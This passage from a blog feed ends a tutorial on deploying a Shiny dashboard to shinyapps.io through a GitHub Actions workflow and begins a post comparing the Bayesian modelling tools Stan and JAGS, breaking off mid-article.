&lt;p&gt;Next we&amp;rsquo;ll need to generate an access token from shinyapps.io, which will allow GitHub Actions access to our account for the purposes of uploading the shiny apps.&lt;/p&gt;
&lt;p&gt;Having logged into &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt;, go to the &lt;em&gt;Account&lt;/em&gt; → &lt;em&gt;Tokens&lt;/em&gt; section of the menu. Click the button to &amp;ldquo;Add token&amp;rdquo;, and make a note of the &lt;em&gt;Token&lt;/em&gt; and &lt;em&gt;Secret&lt;/em&gt; values. For security reasons, the &lt;em&gt;Secret&lt;/em&gt; will be hidden until you reveal it.&lt;/p&gt;
&lt;p&gt;Now in GitHub, go to the repository&amp;rsquo;s settings and navigate to the &lt;em&gt;Secrets&lt;/em&gt; → &lt;em&gt;Actions&lt;/em&gt; menu. Create a new repository secret for each of the name, token and secret values taken from shinyapps.io.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Create a new secret for GitHub Actions by entering a name and the account name, token or secret values. Then click the “Add secret” button to save the value." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/new_github_actions_secret.png" width="707"&gt;&lt;/p&gt;
&lt;p&gt;When you&amp;rsquo;re done, you should have three secrets which you&amp;rsquo;ve named for use in GitHub Actions:&lt;/p&gt;
&lt;p&gt;&lt;img alt="GitHub will list the secrets that have been made. Here we have created three secrets for GitHub Actions, named “SHINYAPPS_NAME”, “SHINYAPPS_TOKEN”, and “SHINYAPPS_SECRET”." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/github_actions_secrets.png" width="707"&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll use an &lt;a href="https://github.com/r-lib/actions/blob/v2-branch/examples/shiny-deploy.yaml" target="_blank"&gt;example template from r-lib actions&lt;/a&gt; which is made to provide a GitHub Actions workflow. This will perform a number of jobs: creating an ubuntu instance; pulling the latest version of your code from the main branch on GitHub; installing and preparing R, installing package dependencies from the renv lockfile, and then performing the necessary steps to deploy the application to GitHub Actions.
We just need to edit a few lines specifying the &lt;code&gt;APPNAME&lt;/code&gt; and &lt;code&gt;SERVER&lt;/code&gt;, and store it in a new directory (in the GitHub repository&amp;rsquo;s root directory) of &lt;code&gt;.github/workflows/&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# .github/workflows/shiny-deploy.yaml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;on&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;push&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;branches&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;main, master]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;shiny-deploy&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;jobs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shiny-deploy&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;runs-on&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;ubuntu-latest&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;env&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;GITHUB_PAT&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${{ secrets.GITHUB_TOKEN }}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;steps&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;actions/checkout@v3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-pandoc@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-r@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;with&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;use-public-rspm&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-renv@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Install rsconnect&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;run&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;install.packages(&amp;#34;rsconnect&amp;#34;)&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shell&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Rscript {0}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Authorize and deploy app&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;env&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Provide your app name and deployment server below&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;APPNAME&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;github-deployed-app&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;SERVER&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;shinyapps.io&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;run&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;|&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; rsconnect::setAccountInfo(&amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;${{ secrets.SHINYAPPS_TOKEN }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;${{ secrets.SHINYAPPS_SECRET }}&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; rsconnect::deployApp(appName = &amp;#34;${{ env.APPNAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; account = &amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; server = &amp;#34;${{ env.SERVER }}&amp;#34;)&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shell&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Rscript {0}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we commit the new file and push the change to the default branch, GitHub will automatically run the workflow on their servers for us.
We can see progress on the &amp;ldquo;Actions&amp;rdquo; page of the repository, where it will display whether a pipeline is currently running, or has finished with a &lt;i class="fa fa-check-circle-o" style="color:#2da160;"&gt;&lt;/i&gt; pass or &lt;i class="fa fa-times-circle-o" style="color:#ec5941;"&gt;&lt;/i&gt; fail status.
Details for a failing pipeline can be viewed by clicking on the failed pipeline and viewing the output generated during that workflow.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The “Actions” page of the GitHub repository lists the workflows that are currently running, as well as records from previous workflows. A tick signifies the workflow has succeeded, while a cross indicated the workflow has failed." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/list_of_github_actions.png" width="1368"&gt;&lt;/p&gt;
&lt;p&gt;When the pipeline has succeeded, we can view the newly deployed app on shinyapps.io.
The app&amp;rsquo;s deployment address will be of the format https://[USERNAME].shinyapps.io/[APPNAME], where [USERNAME] and [APPNAME] are replaced with the values used in the deployment .yaml file.&lt;/p&gt;
&lt;h2 id="whats-the-net-result"&gt;What&amp;rsquo;s the net result?&lt;/h2&gt;
&lt;p&gt;Creating the automated processes and workflows to manage the &lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" target="_blank"&gt;WHO/Europe COVID-19 Vaccine Programme Monitor&lt;/a&gt; for the WHO/Europe required an investment in time and money. But those costs over the short-term have generated long-term savings in terms of the maintenance and time required to manage their data processing and the hosting of the dashboard.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s important to note that not everything is done automatically for us. As is the way with real world data, there are always going to be a few data quality anomalies that mean members of WHO/Europe will prepare a small amount of the data themselves as part of the overall workflow. This is not necessarily a bad thing; there are many instances where &lt;a href="https://youtu.be/sseSi0k3Ecg?t=232" target="_blank"&gt;fully automated systems have produced ludricous results when left to operate unsupervised&lt;/a&gt;, so maintaining a human touch can help keep things in check.
But with 95% of the work being handled automatically, members from both WHO/Europe and Jumping Rivers are free to focus on other more important matters.&lt;/p&gt;
&lt;p&gt;For the last few months, the app has mostly looked after itself in a reliable way. And for an automated process, there can be no higher praise.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I learn Stan?</title><link>https://www.jumpingrivers.com/blog/why-stan/</link><pubDate>Thu, 09 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-stan/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-stan/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-stan/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="a-little-bit-about-you"&gt;A little bit about you&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s assume you&amp;rsquo;re familiar with Bayesian statistics; you know what I mean when I say prior, likelihood and posterior. Recall that an MCMC scheme constructs a Markov chain as a method to sample from the posterior density.&lt;/p&gt;
&lt;p&gt;You may have used a probabilistic programming language (PPL) in the past, such as &lt;a href="https://www.mrc-bsu.cam.ac.uk/software/bugs/" rel="external"&gt;BUGS&lt;/a&gt;, to perform Bayesian inference. You&amp;rsquo;ve heard about &lt;a href="https://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; and want to learn a little more. Or maybe you&amp;rsquo;re about to step into the Bayesian paradigm and don&amp;rsquo;t know where to start. You want to know whether you should make the switch from JAGS to Stan, &lt;em&gt;or&lt;/em&gt; you&amp;rsquo;ve used neither of &lt;a href="https://mcmc-jags.sourceforge.io/" rel="external"&gt;JAGS&lt;/a&gt; or Stan and want to know which will suit you best. This post will focus solely on the differences between JAGS and Stan as I have experience with both of them, but there are many more PPLs out there. For example, I have never used &lt;a href="https://beanmachine.org/" rel="external"&gt;&lt;em&gt;Bean Machine&lt;/em&gt;&lt;/a&gt;, but of all the PPLs, it certainly takes the crown for best name.&lt;/p&gt;
&lt;p&gt;Although Stan is a PPL, JAGS technically &lt;em&gt;isn&amp;rsquo;t&lt;/em&gt; a programming language (more on this later). We will use the term &amp;ldquo;Bayesian modelling software&amp;rdquo; to talk about them both.&lt;/p&gt;
&lt;h3 id="why-use-bayesian-modelling-software"&gt;Why use Bayesian modelling software?&lt;/h3&gt;
&lt;p&gt;When we do a (fully) Bayesian analysis we essentially have two ways to estimate the model parameters. If you have too much spare time on your hands, option A: &lt;em&gt;write a bespoke sampling scheme&lt;/em&gt; might appeal to you. If you have other things to do, and want your inferences to be reliable, then I&amp;rsquo;d recommend option B: &lt;em&gt;construct your model with purpose built software&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The advantages of using Bayesian modelling software over hand-coding a bespoke sampler are similar to the advantages of using a package or library over hand-coding any other model. There&amp;rsquo;s no need to reinvent the wheel when somebody else has done all the hard work.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-why-stan"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="differences-at-a-glance"&gt;Differences at a glance&lt;/h3&gt;
&lt;p&gt;Stan is a free, open source PPL based on C++. It was developed to allow us to conduct Bayesian inference without the need to write bespoke sampling algorithms. Stan is named after &lt;em&gt;Stanislaw Ulam&lt;/em&gt;, who helped develop the first MCMC methods in the 1940s. Andrew Gelman, one of the lead Stan developers, thinks that in hindsight, &lt;a href="https://www.nytimes.com/2021/02/09/science/arianna-wright-dead.html" rel="external"&gt;&lt;em&gt;Arianna&lt;/em&gt; would have been a better name&lt;/a&gt; than Stan, as it was Arianna Rosenbluth who &lt;em&gt;programmed&lt;/em&gt; the first MCMC algorithm. A basic Stan program for linear regression looks like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;// A linear regression in Stan
data {
int N; // sample size
vector[N] y; // response variable
vector[N] x; // predictor variable
}
parameters {
real alpha; // intercept
real beta; // slope
real&amp;lt;lower=0&amp;gt; tau; // precision
}
model {
// likelihood
y ~ normal(alpha + beta * x, 1 / sqrt(tau));
// prior
alpha ~ normal(0, 1);
beta ~ normal(0, 1);
tau ~ gamma(2, 2);
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Stan might feel intimidating if you&amp;rsquo;ve never used a statically typed language before (languages like C++ and Java). Statically typed means we must declare the type of all variables in Stan. For example, our sample size, &lt;code&gt;N&lt;/code&gt; is of type &lt;code&gt;int&lt;/code&gt;: it is an integer. If we try to set &lt;code&gt;N = 12.5&lt;/code&gt; the Stan program will not run! R programmers like myself often take types for granted, especially numerical types.&lt;/p&gt;
&lt;p&gt;Similarly, JAGS is free, written in C++, and allows us to perform Bayesian computation without knowing too much about MCMC schemes. JAGS is an acronym for &amp;ldquo;Just Another Gibbs Sampler&amp;rdquo;; we&amp;rsquo;ll expand on this a bit later. A simple linear regression in JAGS might look like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## A linear regression in JAGS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# likelihood&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;N) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; x[i], tau)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# prior&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# intercept&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# slope&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tau &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dgamma&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# residual precision&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;One difference between the two softwares is that a Stan program is broken into &amp;ldquo;blocks&amp;rdquo; which allows the user to tell Stan what all the different variables in our code represent. There are more optional blocks to a Stan program. Conversely, the JAGS model is usually just one block. JAGS will work out for itself which of the included variables are known (data) and which are unknown (parameters) based on what data is passed to the JAGS program. Another difference in the model specification is vectorisation. Stan allows (and encourages) you to &lt;em&gt;vectorise&lt;/em&gt; your code. In Stan, we wrote &lt;code&gt;y ~ normal(alpha + beta * x, 1 / sqrt(tau))&lt;/code&gt;. This is &amp;ldquo;short hand&amp;rdquo; for a &lt;code&gt;for&lt;/code&gt; loop; &lt;code&gt;y[i] ~ normal(alpha + beta * x[i], 1 / sqrt(tau))&lt;/code&gt;. Vectorising gives us cleaner looking code and can bring computational advantages. Conversely, JAGS code is much more difficult to vectorise, thus we must rely on slow &lt;code&gt;for&lt;/code&gt; loops more often.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve used R a lot, the JAGS code might invoke some kind of déjà vu. JAGS code is supposed to look a bit like R code. Distributions are specified by &lt;code&gt;d*()&lt;/code&gt;, the types of a variable are interpreted (JAGS figures out if things are real, integer, etc) and we use &lt;code&gt;#&lt;/code&gt; to write comments. With JAGS, the normal distribution is parameterised by the &lt;em&gt;precision&lt;/em&gt; rather than the variance, but otherwise, if you have a basic understanding of R, you will be pretty good at guessing what JAGS code does.&lt;/p&gt;
&lt;h3 id="differences-in-user-experience"&gt;Differences in user experience&lt;/h3&gt;
&lt;h4 id="running-your-models"&gt;Running your models&lt;/h4&gt;
&lt;p&gt;JAGS and Stan can be run on their own, via the command line, but we will likely be pre-processing our data in a more general language like R or Python. An interface between our go-to language and our Bayesian modelling software allows our &amp;ldquo;main&amp;rdquo; language to run Stan or JAGS code. For R users, {rstan} provides this functionality for Stan, and {rjags} provides this for JAGS. There are similar interfaces for other languages (e.g. for Python, use PyStan and PyJAGS). These interfaces have a similar feel.&lt;/p&gt;
&lt;h4 id="writing-code"&gt;Writing code&lt;/h4&gt;
&lt;p&gt;A big part of coding up a Bayesian model in Bayesian modelling software is, well, coding up the model.&lt;/p&gt;
&lt;p&gt;One thing I really like about Stan is the &lt;code&gt;functions&lt;/code&gt; block. Good coding practice tells us we should put commonly used blocks of code into a function. This could be handy if we want to fit a non-linear regression model. In Stan, if we wanted to use the expression \( \alpha + e^ {\beta x}\) many times we could define this as a function:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;functions {
real non_linear_mean(real alpha, real beta, real x) {
return alpha + exp(beta * x);
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This function can be used just like any inbuilt Stan function. JAGS does not have friendly support for user-defined functions or distributions; essentially you need to write your own JAGS module in C++.&lt;/p&gt;
&lt;p&gt;Another thing I like about Stan is that syntax highlighting is supported in many popular IDEs. RStudio has out the box support for Stan, whilst other popular IDEs such as Vim and Jupyter have Stan plug-ins. This is because Stan is a &lt;em&gt;language&lt;/em&gt;. As far as I can tell, the only editor that supports JAGS syntax is Emacs (and that&amp;rsquo;s not even out of the box). The lack of support is probably because JAGS is a &lt;em&gt;program&lt;/em&gt; and not a language. Personally, I&amp;rsquo;d find a full data science workflow in Emacs less than ideal. For this post, I used R syntax highlighting on the JAGS code. However, we normally write JAGS code within a string, so the entire model would be highlighted as a string. Stan syntax highlighting is supported by more user friendly environments and is even supported by &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;, which is handy if you&amp;rsquo;re teaching Bayesian modelling!&lt;/p&gt;
&lt;h4 id="getting-help"&gt;Getting help&lt;/h4&gt;
&lt;p&gt;Reaching out online to get help is a huge part of the user experience. The &lt;a href="https://discourse.mc-stan.org/" rel="external"&gt;Stan Forums&lt;/a&gt; are a hive of activity with questions regularly being answered by the Stan development team themselves. As far as I can tell, the JAGS community does not seem to be as active. Stan even has its own &lt;a href="https://mc-stan.org/events/" rel="external"&gt;conference&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="differences-under-the-hood"&gt;Differences under the hood&lt;/h3&gt;
